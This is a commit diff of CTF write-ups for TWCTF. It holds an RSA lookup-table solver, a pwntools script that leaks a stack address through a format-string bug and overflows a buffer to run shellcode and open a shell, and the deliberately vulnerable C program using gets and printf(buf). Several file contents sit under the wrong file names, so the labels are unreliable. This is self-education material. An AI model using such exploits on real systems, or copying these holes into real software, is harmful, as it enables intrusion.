Added twctf

Author: 0xf4b1

README.md

@@ -13,6 +13,7 @@ My solutions for various CTF challenges
 - [nactf.com](nactf.com)
 - [ctf.csaw.io](ctf.csaw.io)
 - [affinityctf](affinityctf)
+- [twctf](twctf)
 
 Capturing flags for self-education in information security since July 2019.
 

twctf/README.md

@@ -0,0 +1,10 @@
+# twctf
+
+## crypto
+
+- [real-baby-rsa](crypto/real-baby-rsa)
+
+## pwn
+
+- [nothing-more-to-say](pwn/nothing-more-to-say)
+

twctf/crypto/real-baby-rsa/README.md

@@ -0,0 +1,11 @@
+# real-baby-rsa
+
+## crypto - Points: 40
+
+> [problem.py](problem.py)
+>
+> [output](output)
+
+Given is a python script, that encrypts a flag with `N` and `e`, and the encrypted `output`. Every character is encrypted separately, so we can create a lookup table by encrypting all possible printable characters with the same parameters and then simply look them up to get the flag.
+
+flag: `TWCTF{padding_is_important}`

twctf/crypto/real-baby-rsa/output

@@ -0,0 +1,9 @@
+flag = 'TWCTF{CENSORED}'
+
+# Public Parameters
+N = 36239973541558932215768154398027510542999295460598793991863043974317503405132258743580804101986195705838099875086956063357178601077684772324064096356684008573295186622116931603804539480260180369510754948354952843990891989516977978839158915835381010468654190434058825525303974958222956513586121683284362090515808508044283236502801777575604829177236616682941566165356433922623572630453807517714014758581695760621278985339321003215237271785789328502527807304614754314937458797885837846005142762002103727753034387997014140695908371141458803486809615038309524628617159265412467046813293232560959236865127539835290549091
+e = 65537
+
+# Encrypt the flag!
+for char in flag:
+    print(pow(ord(char), e, N))

twctf/crypto/real-baby-rsa/problem.py

@@ -0,0 +1,19 @@
+N = 36239973541558932215768154398027510542999295460598793991863043974317503405132258743580804101986195705838099875086956063357178601077684772324064096356684008573295186622116931603804539480260180369510754948354952843990891989516977978839158915835381010468654190434058825525303974958222956513586121683284362090515808508044283236502801777575604829177236616682941566165356433922623572630453807517714014758581695760621278985339321003215237271785789328502527807304614754314937458797885837846005142762002103727753034387997014140695908371141458803486809615038309524628617159265412467046813293232560959236865127539835290549091
+e = 65537
+
+
+with open("output", 'r') as file:
+	data = file.read().splitlines()
+
+
+keys = {}
+for i in range(33,126):
+	keys[str(pow(i, e, N))] = chr(i)
+
+
+flag = ''
+for cipher in data:
+	flag += keys[cipher]
+
+
+print flag

twctf/crypto/real-baby-rsa/sol.py

@@ -0,0 +1,42 @@
+# nothing more to say
+
+## pwn - Points: 78
+
+> Japan is fucking hot. nc nothing.chal.ctf.westerns.tokyo 10001
+>
+> [warmup](warmup)
+>
+> [warmup.c](warmup.c)
+
+The binary has no security mechanisms enabled, we can overflow the buffer and can exploit format strings! This gives many exploit possibilities, I decided to place shellcode on the stack and overwrite the `RIP` to jump to it. The only challenge is to deal with `ASLR` and find a reliable way to leak an address that points on the shellcode.
+
+Thanks to the format string vulnerability I could search for offsets whose contents are addresses that point somewhere in the program memory space and calculated offsets that point to the overwritten buffer. So on the first stage the input is a format string to leak an address and overflow the `RIP` to point to the `main` function to recursively call it again for another input.
+
+On the second stage the input is a large `NOP` slide and then the shellcode and an address to overwrite the `RIP` that hopefully points somewhere on the `NOP` slide.
+
+Exploit script:
+
+```python
+from pwn import *
+
+
+context.clear(arch='amd64')
+shellcode = asm(shellcraft.sh())
+
+p = process('warmup')
+# p = remote("nothing.chal.ctf.westerns.tokyo", 10001)
+
+p.recvuntil(':)\n')
+
+fmt_str = '%47$p'
+p.sendline(fmt_str + '\x41' * (264-len(fmt_str)) + p64(0x4006ba))
+
+resp = p.recvuntil(':)\n')
+print resp
+
+stk = resp[2:14]
+RIP = p64(int(stk,16) - 400)
+
+p.sendline('\x5a' * (264-len(shellcode)) + shellcode + RIP)
+p.interactive()
+```

twctf/pwn/nothing-more-to-say/README.md

@@ -0,0 +1,22 @@
+from pwn import *
+
+
+context.clear(arch='amd64')
+shellcode = asm(shellcraft.sh())
+
+p = process('warmup')
+# p = remote("nothing.chal.ctf.westerns.tokyo", 10001)
+
+p.recvuntil(':)\n')
+
+fmt_str = '%47$p'
+p.sendline(fmt_str + '\x41' * (264-len(fmt_str)) + p64(0x4006ba))
+
+resp = p.recvuntil(':)\n')
+print resp
+
+stk = resp[2:14]
+RIP = p64(int(stk,16) - 400)
+
+p.sendline('\x5a' * (264-len(shellcode)) + shellcode + RIP)
+p.interactive()

twctf/pwn/nothing-more-to-say/sol.py

@@ -0,0 +1,18 @@
+// gcc -fno-stack-protector -no-pie -z execstack  warmup.c -o warmup
+#include <stdio.h>
+
+void init_proc() {
+    setbuf(stdout, NULL);
+    setbuf(stdin, NULL);
+    setbuf(stderr, NULL);
+}
+
+
+int main(void) {
+    char buf[0x100];
+    init_proc();
+    puts("Hello CTF Players!\nThis is a warmup challenge for pwnable.\nWe provide some hints for beginners spawning a shell to get the flag.\n\n1. This binary has no SSP (Stack Smash Protection). So you can get control of instruction pointer with stack overflow.\n2. NX-bit is disabled. You can run your shellcode easily.\n3. PIE (Position Independent Executable) is also disabled. Some memory addresses are fixed by default.\n\nIf you get stuck, we recommend you to search about ROP and x64-shellcode.\nPlease pwn me :)");
+    gets(buf);
+    printf(buf);
+    return 0;
+}